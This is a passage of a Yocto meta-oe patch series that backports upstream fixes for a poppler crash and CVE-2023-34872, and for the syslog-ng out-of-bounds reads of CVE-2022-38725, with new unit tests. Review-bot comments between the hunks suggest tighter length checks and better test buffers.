++ error(errSyntaxError, getPos(), "Too many symbols in JBIG2 text region");
++ return;
++ }
+ } else if (seg->getType() == jbig2SegCodeTable) {
+ codeTables.push_back(seg);
+ }
+--
+2.25.1
diff --git a/meta-oe/recipes-support/poppler/poppler/CVE-2023-34872.patch b/meta-oe/recipes-support/poppler/poppler/CVE-2023-34872.patch
new file mode 100644
index 0000000000..7fdc293aac
--- /dev/null
+++ b/meta-oe/recipes-support/poppler/poppler/CVE-2023-34872.patch
@@ -0,0 +1,46 @@ +From 591235c8b6c65a2eee88991b9ae73490fd9afdfe Mon Sep 17 00:00:00 2001 +From: Albert Astals Cid <aacid@kde.org> +Date: Fri, 18 Aug 2023 08:22:06 +0000 +Subject: [PATCH] OutlineItem::open: Fix crash on malformed files + +Fixes #1399 + +CVE: CVE-2023-34872 + +Upstream-Status: Backport [https://gitlab.freedesktop.org/poppler/poppler/-/commit/591235c8b6c65a2eee88991b9ae73490fd9afdfe] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + poppler/Outline.cc | 10 +++++++--- + 1 file changed, 7 insertions(+), 3 deletions(-) + +diff --git a/poppler/Outline.cc b/poppler/Outline.cc +index cbb6cb4..4c68be9 100644 +--- a/poppler/Outline.cc ++++ b/poppler/Outline.cc +@@ -14,7 +14,7 @@ + // under GPL version 2 or later + // + // Copyright (C) 2005 Marco Pesenti Gritti <mpg@redhat.com> +-// Copyright (C) 2008, 2016-2019, 2021 Albert Astals Cid <aacid@kde.org> ++// Copyright (C) 2008, 2016-2019, 2021, 2023 Albert Astals Cid <aacid@kde.org> + // Copyright (C) 2009 Nick Jones <nick.jones@network-box.com> + // Copyright (C) 2016 Jason Crain <jason@aquaticape.us> + // Copyright (C) 2017 Adrian Johnson <ajohnson@redneon.com> +@@ -483,8 +483,12 @@ void OutlineItem::open() + { + if (!kids) { + Object itemDict = xref->fetch(ref); +- const Object &firstRef = itemDict.dictLookupNF("First"); +- kids = readItemList(this, &firstRef, xref, doc); ++ if (itemDict.isDict()) { ++ const Object &firstRef = itemDict.dictLookupNF("First"); ++ kids = readItemList(this, &firstRef, xref, doc); ++ } else { ++ kids = new std::vector<OutlineItem *>(); ++ } + } + } + +-- +2.35.5 diff --git a/meta-oe/recipes-support/poppler/poppler_22.04.0.bb b/meta-oe/recipes-support/poppler/poppler_22.04.0.bb index b7cdb4f1be..04106f11aa 100644 --- a/meta-oe/recipes-support/poppler/poppler_22.04.0.bb +++ b/meta-oe/recipes-support/poppler/poppler_22.04.0.bb 
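Review bot: The new `else` branch in `OutlineItem::open()` assigns an empty vector to `kids` without saying why. With `kids` non-null, the `if (!kids)` guard will not fetch the same malformed object again on a later call, and that reasoning is worth recording next to the assignment: `// itemDict is not a dictionary (malformed file): treat the item as having no children`. What callers expect from `kids` after `open()` is outside the hunk.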
@@ -6,6 +6,8 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe" SRC_URI = "http://poppler.freedesktop.org/${BP}.tar.xz \ file://0001-Do-not-overwrite-all-our-build-flags.patch \ file://basename-include.patch \ + file://0001-JBIG2Stream-Fix-crash-on-broken-file.patch \ + file://CVE-2023-34872.patch \ " SRC_URI[sha256sum] = "813fb4b90e7bda63df53205c548602bae728887a60f4048aae4dbd9b1927deff" diff --git a/meta-oe/recipes-support/re2/re2_2020.11.01.bb b/meta-oe/recipes-support/re2/re2_2020.11.01.bb index 698fe7e497..5ec1c6b5ab 100644 --- a/meta-oe/recipes-support/re2/re2_2020.11.01.bb +++ b/meta-oe/recipes-support/re2/re2_2020.11.01.bb @@ -5,7 +5,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=3b5c31eb512bdf3cb11ffd5713963760" SRCREV = "166dbbeb3b0ab7e733b278e8f42a84f6882b8a25" -SRC_URI = "git://github.com/google/re2.git;branch=master;protocol=https" +SRC_URI = "git://github.com/google/re2.git;branch=main;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0001.patch b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0001.patch new file mode 100644 index 0000000000..7d1dd6582f --- /dev/null +++ b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0001.patch 
@@ -0,0 +1,65 @@ +From b5a060f2ebb8d794f508436a12e4d4163f94b1b8 Mon Sep 17 00:00:00 2001 +From: Laszlo Varady <laszlo.varady@protonmail.com> +Date: Sat, 20 Aug 2022 12:26:05 +0200 +Subject: [PATCH 1/8] syslogformat: fix out-of-bounds reading of data buffer +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +CVE: CVE-2022-38725 + +Upstream-Status: Backport +[https://github.com/syslog-ng/syslog-ng/commit/b5a060f2ebb8d794f508436a12e4d4163f94b1b8] + +Signed-off-by: László Várady <laszlo.varady@protonmail.com> + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + modules/syslogformat/syslog-format.c | 10 +++++++--- + 1 file changed, 7 insertions(+), 3 deletions(-) + +diff --git a/modules/syslogformat/syslog-format.c b/modules/syslogformat/syslog-format.c +index aacb525b3..872cc1d71 100644 +--- a/modules/syslogformat/syslog-format.c ++++ b/modules/syslogformat/syslog-format.c +@@ -223,6 +223,9 @@ log_msg_parse_cisco_timestamp_attributes(LogMessage *self, const guchar **data, + const guchar *src = *data; + gint left = *length; + ++ if (!left) ++ return; ++ + /* Cisco timestamp extensions, the first '*' indicates that the clock is + * unsynced, '.' 
if it is known to be synced */ + if (G_UNLIKELY(src[0] == '*')) +@@ -562,7 +565,7 @@ log_msg_parse_sd(LogMessage *self, const guchar **data, gint *length, const MsgF + open_sd++; + do + { +- if (!isascii(*src) || *src == '=' || *src == ' ' || *src == ']' || *src == '"') ++ if (!left || !isascii(*src) || *src == '=' || *src == ' ' || *src == ']' || *src == '"') + goto error; + /* read sd_id */ + pos = 0; +@@ -595,7 +598,8 @@ log_msg_parse_sd(LogMessage *self, const guchar **data, gint *length, const MsgF + sd_id_len = pos; + strcpy(sd_value_name, logmsg_sd_prefix); + strncpy(sd_value_name + logmsg_sd_prefix_len, sd_id_name, sizeof(sd_value_name) - logmsg_sd_prefix_len); +- if (*src == ']') ++ ++ if (left && *src == ']') + { + log_msg_set_value_by_name(self, sd_value_name, "", 0); + } +@@ -612,7 +616,7 @@ log_msg_parse_sd(LogMessage *self, const guchar **data, gint *length, const MsgF + else + goto error; + +- if (!isascii(*src) || *src == '=' || *src == ' ' || *src == ']' || *src == '"') ++ if (!left || !isascii(*src) || *src == '=' || *src == ' ' || *src == ']' || *src == '"') + goto error; + + /* read sd-param */ +-- +2.34.1 + diff --git a/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0002.patch b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0002.patch new file mode 100644 index 0000000000..9ccb24ddea --- /dev/null +++ b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0002.patch 
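Review bot: The added guards test `!left`, which rejects only a remaining length of exactly zero. `left` is a `gint` (`gint left = *length;` in `log_msg_parse_cisco_timestamp_attributes`), so a negative value would pass the guard and `*src` would still be read. CVE-2022-38725-0004.patch in this series writes the equivalent check as `*length > 0`; the same form here would be safer and consistent, e.g. `if (left <= 0) return;` and `if (left <= 0 || !isascii(*src) || ...)`. The `!left || *src != ' '` guard in CVE-2022-38725-0003.patch and the `left && *src == ':'` guards in CVE-2022-38725-0008.patch have the same shape. Whether `left` can actually become negative depends on code outside these hunks.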
@@ -0,0 +1,150 @@ +From 81a07263f1e522a376d3a30f96f51df3f2879f8a Mon Sep 17 00:00:00 2001 +From: Laszlo Varady <laszlo.varady@protonmail.com> +Date: Sat, 20 Aug 2022 12:22:44 +0200 +Subject: [PATCH 2/8] syslogformat: add bug reproducer test for non-zero terminated + input +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +CVE: CVE-2022-38725 + +Upstream-Status: Backport +[https://github.com/syslog-ng/syslog-ng/commit/81a07263f1e522a376d3a30f96f51df3f2879f8a] + +Signed-off-by: László Várady <laszlo.varady@protonmail.com> + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + modules/syslogformat/CMakeLists.txt | 1 + + modules/syslogformat/Makefile.am | 2 + + modules/syslogformat/tests/CMakeLists.txt | 1 + + modules/syslogformat/tests/Makefile.am | 9 +++ + .../syslogformat/tests/test_syslog_format.c | 72 +++++++++++++++++++ + 5 files changed, 85 insertions(+) + create mode 100644 modules/syslogformat/tests/CMakeLists.txt + create mode 100644 modules/syslogformat/tests/Makefile.am + create mode 100644 modules/syslogformat/tests/test_syslog_format.c + +diff --git a/modules/syslogformat/CMakeLists.txt b/modules/syslogformat/CMakeLists.txt +index 94ee01aa2..64848efee 100644 +--- a/modules/syslogformat/CMakeLists.txt ++++ b/modules/syslogformat/CMakeLists.txt +@@ -14,3 +14,4 @@ add_module( + SOURCES ${SYSLOGFORMAT_SOURCES} + ) + ++add_test_subdirectory(tests) +diff --git a/modules/syslogformat/Makefile.am b/modules/syslogformat/Makefile.am +index f13f88c1b..14cdf589d 100644 +--- a/modules/syslogformat/Makefile.am ++++ b/modules/syslogformat/Makefile.am +@@ -31,3 +31,5 @@ modules_syslogformat_libsyslogformat_la_DEPENDENCIES = \ + modules/syslogformat modules/syslogformat/ mod-syslogformat: \ + modules/syslogformat/libsyslogformat.la + .PHONY: modules/syslogformat/ mod-syslogformat ++ ++include modules/syslogformat/tests/Makefile.am +diff --git a/modules/syslogformat/tests/CMakeLists.txt 
b/modules/syslogformat/tests/CMakeLists.txt +new file mode 100644 +index 000000000..2e45b7194 +--- /dev/null ++++ b/modules/syslogformat/tests/CMakeLists.txt +@@ -0,0 +1 @@ ++add_unit_test(CRITERION TARGET test_syslog_format DEPENDS syslogformat) +diff --git a/modules/syslogformat/tests/Makefile.am b/modules/syslogformat/tests/Makefile.am +new file mode 100644 +index 000000000..7ee66a59c +--- /dev/null ++++ b/modules/syslogformat/tests/Makefile.am +@@ -0,0 +1,9 @@ ++modules_syslogformat_tests_TESTS = \ ++ modules/syslogformat/tests/test_syslog_format ++ ++check_PROGRAMS += ${modules_syslogformat_tests_TESTS} ++ ++EXTRA_DIST += modules/syslogformat/tests/CMakeLists.txt ++ ++modules_syslogformat_tests_test_syslog_format_CFLAGS = $(TEST_CFLAGS) -I$(top_srcdir)/modules/syslogformat ++modules_syslogformat_tests_test_syslog_format_LDADD = $(TEST_LDADD) $(PREOPEN_SYSLOGFORMAT) +diff --git a/modules/syslogformat/tests/test_syslog_format.c b/modules/syslogformat/tests/test_syslog_format.c +new file mode 100644 +index 000000000..b247fe3c5 +--- /dev/null ++++ b/modules/syslogformat/tests/test_syslog_format.c +@@ -0,0 +1,72 @@ ++/* ++ * Copyright (c) 2022 One Identity ++ * Copyright (c) 2022 László Várady ++ * ++ * This program is free software; you can redistribute it and/or modify it ++ * under the terms of the GNU General Public License version 2 as published ++ * by the Free Software Foundation, or (at your option) any later version. ++ * ++ * This program is distributed in the hope that it will be useful, ++ * but WITHOUT ANY WARRANTY; without even the implied warranty of ++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ++ * GNU General Public License for more details. 
++ * ++ * You should have received a copy of the GNU General Public License ++ * along with this program; if not, write to the Free Software ++ * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA ++ * ++ * As an additional exemption you are allowed to compile & link against the ++ * OpenSSL libraries as published by the OpenSSL project. See the file ++ * COPYING for details. ++ * ++ */ ++ ++#include <criterion/criterion.h> ++ ++#include "apphook.h" ++#include "cfg.h" ++#include "syslog-format.h" ++#include "logmsg/logmsg.h" ++#include "msg-format.h" ++#include "scratch-buffers.h" ++ ++#include <string.h> ++ ++GlobalConfig *cfg; ++MsgFormatOptions parse_options; ++ ++static void ++setup(void) ++{ ++ app_startup(); ++ syslog_format_init(); ++ ++ cfg = cfg_new_snippet(); ++ msg_format_options_defaults(&parse_options); ++} ++ ++static void ++teardown(void) ++{ ++ scratch_buffers_explicit_gc(); ++ app_shutdown(); ++ cfg_free(cfg); ++} ++ ++TestSuite(syslog_format, .init = setup, .fini = teardown); ++ ++Test(syslog_format, parser_should_not_spin_on_non_zero_terminated_input, .timeout = 10) ++{ ++ const gchar *data = "<182>2022-08-17T05:02:28.217 mymachine su: 'su root' failed for lonvick on /dev/pts/8"; ++ /* chosen carefully to reproduce a bug */ ++ gsize data_length = 27; ++ ++ msg_format_options_init(&parse_options, cfg); ++ LogMessage *msg = msg_format_construct_message(&parse_options, (const guchar *) data, data_length); ++ ++ gsize problem_position; ++ cr_assert(syslog_format_handler(&parse_options, msg, (const guchar *) data, data_length, &problem_position)); ++ ++ msg_format_options_destroy(&parse_options); ++ log_msg_unref(msg); ++} +-- +2.34.1 + diff --git a/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0003.patch b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0003.patch new file mode 100644 index 0000000000..5801165048 --- /dev/null +++ b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0003.patch 
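Review bot: `parser_should_not_spin_on_non_zero_terminated_input` passes `data_length = 27` but `data` points into a longer NUL-terminated string literal. A parser that reads past `data_length` therefore stays inside a valid object, and the test can only catch a hang through `.timeout`, not the over-read itself. Copying exactly `data_length` bytes into a heap buffer would let a sanitizer or valgrind run flag any read past the end: `guchar *buf = g_malloc(data_length); memcpy(buf, data, data_length);`, then pass `buf` to both calls and `g_free(buf)` at the end. The tests added in CVE-2022-38725-0003.patch and CVE-2022-38725-0005.patch also parse string literals with a shorter or `strlen` length and would benefit from the same change.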
@@ -0,0 +1,77 @@ +From 4b8dc56ca8eaeac4c8751a305eb7eeefab8dc89d Mon Sep 17 00:00:00 2001 +From: Laszlo Varady <laszlo.varady@protonmail.com> +Date: Sun, 21 Aug 2022 18:44:28 +0200 +Subject: [PATCH 3/8] syslogformat: fix reading cisco sequence id out of bounds +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +CVE: CVE-2022-38725 + +Upstream-Status: Backport +[https://github.com/syslog-ng/syslog-ng/commit/4b8dc56ca8eaeac4c8751a305eb7eeefab8dc89d] + +Signed-off-by: László Várady <laszlo.varady@protonmail.com> + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + modules/syslogformat/syslog-format.c | 2 +- + .../syslogformat/tests/test_syslog_format.c | 32 +++++++++++++++++++ + 2 files changed, 33 insertions(+), 1 deletion(-) + +diff --git a/modules/syslogformat/syslog-format.c b/modules/syslogformat/syslog-format.c +index 872cc1d71..a3d48d6f2 100644 +--- a/modules/syslogformat/syslog-format.c ++++ b/modules/syslogformat/syslog-format.c +@@ -207,7 +207,7 @@ log_msg_parse_cisco_sequence_id(LogMessage *self, const guchar **data, gint *len + + /* if the next char is not space, then we may try to read a date */ + +- if (*src != ' ') ++ if (!left || *src != ' ') + return; + + log_msg_set_value(self, handles.cisco_seqid, (gchar *) *data, *length - left - 1); +diff --git a/modules/syslogformat/tests/test_syslog_format.c b/modules/syslogformat/tests/test_syslog_format.c +index b247fe3c5..d0f5b4043 100644 +--- a/modules/syslogformat/tests/test_syslog_format.c ++++ b/modules/syslogformat/tests/test_syslog_format.c +@@ -70,3 +70,35 @@ Test(syslog_format, parser_should_not_spin_on_non_zero_terminated_input, .timeou + msg_format_options_destroy(&parse_options); + log_msg_unref(msg); + } ++ ++Test(syslog_format, cisco_sequence_id_non_zero_termination) ++{ ++ const gchar *data = "<189>65536: "; ++ gsize data_length = strlen(data); ++ ++ msg_format_options_init(&parse_options, cfg); ++ LogMessage *msg = 
msg_format_construct_message(&parse_options, (const guchar *) data, data_length); ++ ++ gsize problem_position; ++ cr_assert(syslog_format_handler(&parse_options, msg, (const guchar *) data, data_length, &problem_position)); ++ cr_assert_str_eq(log_msg_get_value_by_name(msg, ".SDATA.meta.sequenceId", NULL), "65536"); ++ ++ msg_format_options_destroy(&parse_options); ++ log_msg_unref(msg); ++} ++ ++Test(syslog_format, minimal_non_zero_terminated_numeric_message_is_parsed_as_program_name) ++{ ++ const gchar *data = "<189>65536"; ++ gsize data_length = strlen(data); ++ ++ msg_format_options_init(&parse_options, cfg); ++ LogMessage *msg = msg_format_construct_message(&parse_options, (const guchar *) data, data_length); ++ ++ gsize problem_position; ++ cr_assert(syslog_format_handler(&parse_options, msg, (const guchar *) data, data_length, &problem_position)); ++ cr_assert_str_eq(log_msg_get_value_by_name(msg, "PROGRAM", NULL), "65536"); ++ ++ msg_format_options_destroy(&parse_options); ++ log_msg_unref(msg); ++} +-- +2.34.1 + diff --git a/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0004.patch b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0004.patch new file mode 100644 index 0000000000..cb81b1c122 --- /dev/null +++ b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0004.patch 
@@ -0,0 +1,37 @@ +From 73b5c300b8fde5e7a4824baa83a04931279abb37 Mon Sep 17 00:00:00 2001 +From: Laszlo Varady <laszlo.varady@protonmail.com> +Date: Sat, 20 Aug 2022 12:42:38 +0200 +Subject: [PATCH 4/8] timeutils: fix iterating out of the range of timestamp buffer +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +CVE: CVE-2022-38725 + +Upstream-Status: Backport +[https://github.com/syslog-ng/syslog-ng/commit/73b5c300b8fde5e7a4824baa83a04931279abb37] + +Signed-off-by: László Várady <laszlo.varady@protonmail.com> +Signed-off-by: Balazs Scheidler <bazsi77@gmail.com> + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + lib/timeutils/scan-timestamp.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/lib/timeutils/scan-timestamp.c b/lib/timeutils/scan-timestamp.c +index 304a57673..4fbe94a36 100644 +--- a/lib/timeutils/scan-timestamp.c ++++ b/lib/timeutils/scan-timestamp.c +@@ -332,7 +332,7 @@ __parse_usec(const guchar **data, gint *length) + src++; + (*length)--; + } +- while (isdigit(*src)) ++ while (*length > 0 && isdigit(*src)) + { + src++; + (*length)--; +-- +2.34.1 + diff --git a/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0005.patch b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0005.patch new file mode 100644 index 0000000000..70964b328b --- /dev/null +++ b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0005.patch 
@@ -0,0 +1,211 @@ +From 45f051239312e43bd4f92b9339fe67c6798a0321 Mon Sep 17 00:00:00 2001 +From: Balazs Scheidler <bazsi77@gmail.com> +Date: Sat, 20 Aug 2022 12:43:42 +0200 +Subject: [PATCH 5/8] timeutils: add tests for non-zero terminated inputs + +CVE: CVE-2022-38725 + +Upstream-Status: Backport +[https://github.com/syslog-ng/syslog-ng/commit/45f051239312e43bd4f92b9339fe67c6798a0321] + +Signed-off-by: Balazs Scheidler <bazsi77@gmail.com> + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + lib/timeutils/tests/test_scan-timestamp.c | 126 +++++++++++++++++++--- + 1 file changed, 113 insertions(+), 13 deletions(-) + +diff --git a/lib/timeutils/tests/test_scan-timestamp.c b/lib/timeutils/tests/test_scan-timestamp.c +index 27b76f12d..468bbf779 100644 +--- a/lib/timeutils/tests/test_scan-timestamp.c ++++ b/lib/timeutils/tests/test_scan-timestamp.c +@@ -50,17 +50,21 @@ fake_time_add(time_t diff) + } + + static gboolean +-_parse_rfc3164(const gchar *ts, gchar isotimestamp[32]) ++_parse_rfc3164(const gchar *ts, gint len, gchar isotimestamp[32]) + { + UnixTime stamp; +- const guchar *data = (const guchar *) ts; +- gint length = strlen(ts); ++ const guchar *tsu = (const guchar *) ts; ++ gint tsu_len = len < 0 ? 
strlen(ts) : len; + GString *result = g_string_new(""); + WallClockTime wct = WALL_CLOCK_TIME_INIT; + +- ++ const guchar *data = tsu; ++ gint length = tsu_len; + gboolean success = scan_rfc3164_timestamp(&data, &length, &wct); + ++ cr_assert(length >= 0); ++ cr_assert(data == &tsu[tsu_len - length]); ++ + unix_time_unset(&stamp); + convert_wall_clock_time_to_unix_time(&wct, &stamp); + +@@ -71,16 +75,21 @@ _parse_rfc3164(const gchar *ts, gchar isotimestamp[32]) + } + + static gboolean +-_parse_rfc5424(const gchar *ts, gchar isotimestamp[32]) ++_parse_rfc5424(const gchar *ts, gint len, gchar isotimestamp[32]) + { + UnixTime stamp; +- const guchar *data = (const guchar *) ts; +- gint length = strlen(ts); ++ const guchar *tsu = (const guchar *) ts; ++ gint tsu_len = len < 0 ? strlen(ts) : len; + GString *result = g_string_new(""); + WallClockTime wct = WALL_CLOCK_TIME_INIT; + ++ const guchar *data = tsu; ++ gint length = tsu_len; + gboolean success = scan_rfc5424_timestamp(&data, &length, &wct); + ++ cr_assert(length >= 0); ++ cr_assert(data == &tsu[tsu_len - length]); ++ + unix_time_unset(&stamp); + convert_wall_clock_time_to_unix_time(&wct, &stamp); + +@@ -91,31 +100,60 @@ _parse_rfc5424(const gchar *ts, gchar isotimestamp[32]) + } + + static gboolean +-_rfc3164_timestamp_eq(const gchar *ts, const gchar *expected, gchar converted[32]) ++_rfc3164_timestamp_eq(const gchar *ts, gint len, const gchar *expected, gchar converted[32]) + { +- cr_assert(_parse_rfc3164(ts, converted)); ++ cr_assert(_parse_rfc3164(ts, len, converted)); + return strcmp(converted, expected) == 0; + } + + static gboolean +-_rfc5424_timestamp_eq(const gchar *ts, const gchar *expected, gchar converted[32]) ++_rfc5424_timestamp_eq(const gchar *ts, gint len, const gchar *expected, gchar converted[32]) + { +- cr_assert(_parse_rfc5424(ts, converted)); ++ cr_assert(_parse_rfc5424(ts, len, converted)); + return strcmp(converted, expected) == 0; + } + + #define _expect_rfc3164_timestamp_eq(ts, expected) \ 
+ ({ \ + gchar converted[32]; \ +- cr_expect(_rfc3164_timestamp_eq(ts, expected, converted), "Parsed RFC3164 timestamp does not equal expected, ts=%s, converted=%s, expected=%s", ts, converted, expected); \ ++ cr_expect(_rfc3164_timestamp_eq(ts, -1, expected, converted), "Parsed RFC3164 timestamp does not equal expected, ts=%s, converted=%s, expected=%s", ts, converted, expected); \ ++ }) ++ ++#define _expect_rfc3164_timestamp_len_eq(ts, len, expected) \ ++ ({ \ ++ gchar converted[32]; \ ++ cr_expect(_rfc3164_timestamp_eq(ts, len, expected, converted), "Parsed RFC3164 timestamp does not equal expected, ts=%s, converted=%s, expected=%s", ts, converted, expected); \ ++ }) ++ ++#define _expect_rfc3164_fails(ts, len) \ ++ ({ \ ++ WallClockTime wct = WALL_CLOCK_TIME_INIT; \ ++ const guchar *data = (guchar *) ts; \ ++ gint length = len < 0 ? strlen(ts) : len; \ ++ cr_assert_not(scan_rfc3164_timestamp(&data, &length, &wct)); \ + }) + + #define _expect_rfc5424_timestamp_eq(ts, expected) \ + ({ \ + gchar converted[32]; \ +- cr_expect(_rfc5424_timestamp_eq(ts, expected, converted), "Parsed RFC5424 timestamp does not equal expected, ts=%s, converted=%s, expected=%s", ts, converted, expected); \ ++ cr_expect(_rfc5424_timestamp_eq(ts, -1, expected, converted), "Parsed RFC5424 timestamp does not equal expected, ts=%s, converted=%s, expected=%s", ts, converted, expected); \ ++ }) ++ ++#define _expect_rfc5424_timestamp_len_eq(ts, len, expected) \ ++ ({ \ ++ gchar converted[32]; \ ++ cr_expect(_rfc5424_timestamp_eq(ts, len, expected, converted), "Parsed RFC5424 timestamp does not equal expected, ts=%s, converted=%s, expected=%s", ts, converted, expected); \ ++ }) ++ ++#define _expect_rfc5424_fails(ts, len) \ ++ ({ \ ++ WallClockTime wct = WALL_CLOCK_TIME_INIT; \ ++ const guchar *data = (guchar *) ts; \ ++ gint length = len < 0 ? 
strlen(ts) : len; \ ++ cr_assert_not(scan_rfc5424_timestamp(&data, &length, &wct)); \ + }) + ++ + Test(parse_timestamp, standard_bsd_format) + { + _expect_rfc3164_timestamp_eq("Oct 1 17:46:12", "2017-10-01T17:46:12.000+02:00"); +@@ -164,6 +202,68 @@ Test(parse_timestamp, standard_bsd_format_year_in_the_past) + _expect_rfc3164_timestamp_eq("Dec 31 17:46:12", "2017-12-31T17:46:12.000+01:00"); + } + ++Test(parse_timestamp, non_zero_terminated_rfc3164_iso_input_is_handled_properly) ++{ ++ gchar *ts = "2022-08-17T05:02:28.417Z whatever"; ++ gint ts_len = 24; ++ ++ _expect_rfc3164_timestamp_len_eq(ts, strlen(ts), "2022-08-17T05:02:28.417+00:00"); ++ _expect_rfc3164_timestamp_len_eq(ts, ts_len + 5, "2022-08-17T05:02:28.417+00:00"); ++ _expect_rfc3164_timestamp_len_eq(ts, ts_len, "2022-08-17T05:02:28.417+00:00"); ++ ++ /* no "Z" parsed, timezone defaults to local, forced CET */ ++ _expect_rfc3164_timestamp_len_eq(ts, ts_len - 1, "2022-08-17T05:02:28.417+02:00"); ++ ++ /* msec is partially parsed as we trim the string from the right */ ++ _expect_rfc3164_timestamp_len_eq(ts, ts_len - 2, "2022-08-17T05:02:28.410+02:00"); ++ _expect_rfc3164_timestamp_len_eq(ts, ts_len - 3, "2022-08-17T05:02:28.400+02:00"); ++ _expect_rfc3164_timestamp_len_eq(ts, ts_len - 4, "2022-08-17T05:02:28.000+02:00"); ++ _expect_rfc3164_timestamp_len_eq(ts, ts_len - 5, "2022-08-17T05:02:28.000+02:00"); ++ ++ for (gint i = 6; i < ts_len; i++) ++ _expect_rfc3164_fails(ts, ts_len - i); ++ ++} ++ ++Test(parse_timestamp, non_zero_terminated_rfc3164_bsd_pix_or_asa_input_is_handled_properly) ++{ ++ gchar *ts = "Aug 17 2022 05:02:28: whatever"; ++ gint ts_len = 21; ++ ++ _expect_rfc3164_timestamp_len_eq(ts, strlen(ts), "2022-08-17T05:02:28.000+02:00"); ++ _expect_rfc3164_timestamp_len_eq(ts, ts_len + 5, "2022-08-17T05:02:28.000+02:00"); ++ _expect_rfc3164_timestamp_len_eq(ts, ts_len, "2022-08-17T05:02:28.000+02:00"); ++ ++ /* no ":" at the end, that's a problem, unrecognized */ ++ _expect_rfc3164_fails(ts, 
ts_len - 1); ++ ++ for (gint i = 1; i < ts_len; i++) ++ _expect_rfc3164_fails(ts, ts_len - i); ++} ++ ++Test(parse_timestamp, non_zero_terminated_rfc5424_input_is_handled_properly) ++{ ++ gchar *ts = "2022-08-17T05:02:28.417Z whatever"; ++ gint ts_len = 24; ++ ++ _expect_rfc5424_timestamp_len_eq(ts, strlen(ts), "2022-08-17T05:02:28.417+00:00"); ++ _expect_rfc5424_timestamp_len_eq(ts, ts_len + 5, "2022-08-17T05:02:28.417+00:00"); ++ _expect_rfc5424_timestamp_len_eq(ts, ts_len, "2022-08-17T05:02:28.417+00:00"); ++ ++ /* no "Z" parsed, timezone defaults to local, forced CET */ ++ _expect_rfc5424_timestamp_len_eq(ts, ts_len - 1, "2022-08-17T05:02:28.417+02:00"); ++ ++ /* msec is partially parsed as we trim the string from the right */ ++ _expect_rfc5424_timestamp_len_eq(ts, ts_len - 2, "2022-08-17T05:02:28.410+02:00"); ++ _expect_rfc5424_timestamp_len_eq(ts, ts_len - 3, "2022-08-17T05:02:28.400+02:00"); ++ _expect_rfc5424_timestamp_len_eq(ts, ts_len - 4, "2022-08-17T05:02:28.000+02:00"); ++ _expect_rfc5424_timestamp_len_eq(ts, ts_len - 5, "2022-08-17T05:02:28.000+02:00"); ++ ++ for (gint i = 6; i < ts_len; i++) ++ _expect_rfc5424_fails(ts, ts_len - i); ++ ++} ++ + + Test(parse_timestamp, daylight_saving_behavior_at_spring_with_explicit_timezones) + { +-- +2.34.1 + diff --git a/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0006.patch b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0006.patch new file mode 100644 index 0000000000..81e36c6501 --- /dev/null +++ b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0006.patch 
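Review bot: The new `_expect_rfc3164_fails` and `_expect_rfc5424_fails` macros expand `len` unparenthesised in `gint length = len < 0 ? strlen(ts) : len;`, yet they are called with expressions such as `ts_len - i`. That works today only because of operator precedence; `gint length = (len) < 0 ? (gint) strlen(ts) : (len);` is the robust form. In `non_zero_terminated_rfc3164_bsd_pix_or_asa_input_is_handled_properly` the explicit `_expect_rfc3164_fails(ts, ts_len - 1)` is repeated by the first iteration of the loop that starts at `i = 1`, so one of the two can be dropped.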
@@ -0,0 +1,180 @@ +From 09f489c89c826293ff8cbd282cfc866ab56054c4 Mon Sep 17 00:00:00 2001 +From: Laszlo Varady <laszlo.varady@protonmail.com> +Date: Sat, 20 Aug 2022 14:29:43 +0200 +Subject: [PATCH 6/8] timeutils: name repeating constant +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +CVE: CVE-2022-38725 + +Upstream-Status: Backport +[https://github.com/syslog-ng/syslog-ng/commit/09f489c89c826293ff8cbd282cfc866ab56054c4] + +Signed-off-by: László Várady <laszlo.varady@protonmail.com> + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + lib/timeutils/scan-timestamp.c | 54 ++++++++++++++++++---------------- + 1 file changed, 29 insertions(+), 25 deletions(-) + +diff --git a/lib/timeutils/scan-timestamp.c b/lib/timeutils/scan-timestamp.c +index 4fbe94a36..d22d50973 100644 +--- a/lib/timeutils/scan-timestamp.c ++++ b/lib/timeutils/scan-timestamp.c +@@ -34,41 +34,43 @@ scan_day_abbrev(const gchar **buf, gint *left, gint *wday) + { + *wday = -1; + +- if (*left < 